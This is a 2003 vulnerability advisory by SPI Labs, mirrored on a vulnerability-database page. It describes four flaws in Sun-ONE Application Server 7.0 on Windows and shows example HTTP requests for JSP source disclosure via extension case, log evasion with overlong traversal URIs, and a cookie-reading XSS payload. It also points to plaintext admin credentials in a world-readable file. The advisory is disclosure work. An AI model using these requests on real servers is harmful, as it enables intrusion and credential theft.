Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

sunone.txt

🗓️ 28 May 2003 00:00:00Reported by SPI LabsType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 33 Views

Multiple vulnerabilities found in Sun-ONE Application Server 7.0 for Windows exposure issues.

Code
`Multiple Vulnerabilities in Sun-One Application Server  
-------------------------------------------------------  
  
[Release Date]: May 27, 2003  
  
[System Affected]  
* Sun-ONE Application Server 7.0 for Windows 2000/XP  
  
[Description]  
During a brief audit of a SunONE Application Server installation  
on Windows 2000, SPI Labs discovered a number of vulnerabilities.  
Each of the vulnerabilities is described in detail below. The complete  
advisory is also available from our website at:  
http://www.spidynamics.com/sunone_alert.html.  
  
Issue 1: JSP source code disclosure  
Severity: High  
-------------------------------------  
  
It is possible to view the source code of JSP applications by changing  
the case of the file extension in the HTTP request. The vulnerability  
is due to Unix code being ported to the Microsoft Windows platform where  
the filesystem is case insensitive. When a request is received, the server  
performs a case sensitive check to determine if the request ends in ".jsp".  
If it does, the JSP engine will process it. Otherwise, it will see if it  
can retrieve the requested resource from the filesystem. On Unix operating  
systems, this will fail because of "file.jsp" cannot be opened by asking for  
"file.JSP" However, on Windows the file will be returned because the  
filesystem  
is case insensitive. Below is an example of a normal request/response,  
followed  
by the same request/response with the case change applied. The headers and  
response data have been trimmed for clarity.  
  
[Original request]  
  
GET /hello.jsp HTTP/1.0  
  
  
[Original response]  
  
HTTP/1.1 200 OK  
Server: Sun-ONE-Application-Server/7.0  
(more headers)  
  
<html>  
<head><title>Hello World JSP Example</title></head>  
<body>  
<h1>Hello World</h1>  
It is Fri March 14 15:29:40 EST 2003 and is a beautiful Spring day.  
</body></html>  
  
  
[Request with case change]  
  
GET /hello.JSP HTTP/1.0  
  
[Response with case change]  
  
HTTP/1.1 200 OK  
Server: Sun-ONE-Application-Server/7.0  
(more headers)  
  
<html>  
<head><title>Hello World JSP Example</title></head>  
<body>  
<h1>Hello World</h1>  
It is <%= new java.util.Date().toString() %> and is a beautiful Spring day.  
</body></html>  
  
  
Issue 2: Log evasion  
Severity: Medium  
-------------------------------------  
  
Only the first 4042 characters of a request URI are logged, even though the  
maximum URI length appears to be 4096 characters. This gives an attacker  
54 characters to construct an attack with. Although it is possible that an  
administrator would still notice the unusual requests, he or she would be  
unable  
to determine what files or parameters the attacker would be requesting.  
Because  
of this, the administrator would not be able to find out what components of  
their  
system are being exploited. Below is an example request for /hello.jsp, as  
well  
as the log data. The headers, request and response data have been trimmed  
for clarity.  
  
  
[Request for /hello.jsp]  
  
  
GET  
/AAAAAAAAAAAAAA[ up to 4042 characters]/../hello.jsp HTTP/1.0  
  
  
[Console message]  
  
  
WARNING: HTTP4198: flex log buffer overflow- greater than 4096 characters  
  
Server log file  
  
  
[04/Mar/2003:10:52:05] WARNING ( 1304): HTTP4198: flex log buffer overflow-  
greater than 4096 characters  
  
  
Access log file  
  
172.16.10.47 - - [04/Mar/2003:10:52:04 -0800] "GET  
/AAAAAAAAAA[ up to 4042 characters] ...  
  
The name of the file that was accessed does not appear in the logs.  
  
  
Issue 3: Cross site scripting  
Severity: Low  
-------------------------------------  
  
If an error occurs while processing a Java application, it may be possible  
to  
execute cross-site scripting attacks by placing scripted content in the  
query  
string. Below is an example of a request using a sample application  
followed  
by the relevant portion of the response.  
  
[Request]  
  
GET /webapps-simple/jsp/source.jsp?<script>alert(document.cookie)</script>  
HTTP/1.0  
  
  
[Response snippet]  
  
Exception Report<br><br>  
<b>Message: </b>Internal Server Error<br>  
<p>  
<b>Exception</b>  
<pre>javax.servlet.ServletException: Invalid JSP file  
<script>alert(document.cookie)</script>  
at  
org.apache.jasper.runtime.PageContextImpl.handlePageException(PageContextImp  
l.java:471)  
at _jasper._jsp._source_jsp._jspService(_source_jsp.java:88)  
  
Issue 4: Incorrect local file permissions and plaintext passwords  
Severity: Medium  
-------------------------------------  
  
When installing SunONE on Windows 2000 the default installation directory is  
C:\sun.  
Any file or directory created in this directory will be world-readable. The  
"statefile"  
located at C:\sun\appserver7\statefile contains a plaintext username and  
password to  
the administrative server. .  
  
  
Remediation  
-------------------------------------  
  
Sun Microsystems was contacted on the 18th of March 2003 and again on  
numerous occasions  
without results. We hope that by publishing this information, the vendor  
will correct  
these problems. Unfortunately, there is no remediation procedure for the  
first, second or  
third issues. For the last issue, "Incorrect local file permissions and  
plaintext passwords"  
we recommend that the permissions of the statefile be changed so that only  
the administrator  
can access it.  
  
[Contact Information]  
  
Contact Information  
[email protected]  
SPI Dynamics, Inc.  
115 Perimeter Center Place N.E.  
suite 270  
Atlanta, GA. 30346  
Toll-Free Phone: (866) 774-2700  
  
  
  
SPI Dynamics was founded in 2000 by a team of accomplished Web security  
specialists; SPI Dynamics is  
the leader in Web application security technology. With such signature  
products as WebInspect, SPI Dynamics  
is dedicated to protecting companies' most valuable assets. SPI Dynamics has  
created a new breed of  
Internet security products for the Web application, the most vulnerable yet  
least secure component of  
online business infrastructure.  
  
Copyright (c) 2003 SPI Dynamics, Inc. All rights reserved worldwide.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 May 2003 00:00Current
7.4High risk
Vulners AI Score7.4
sun-one application servervulnerabilitiesjsp source code disclosurewindows 2000system affectedseverity high.
33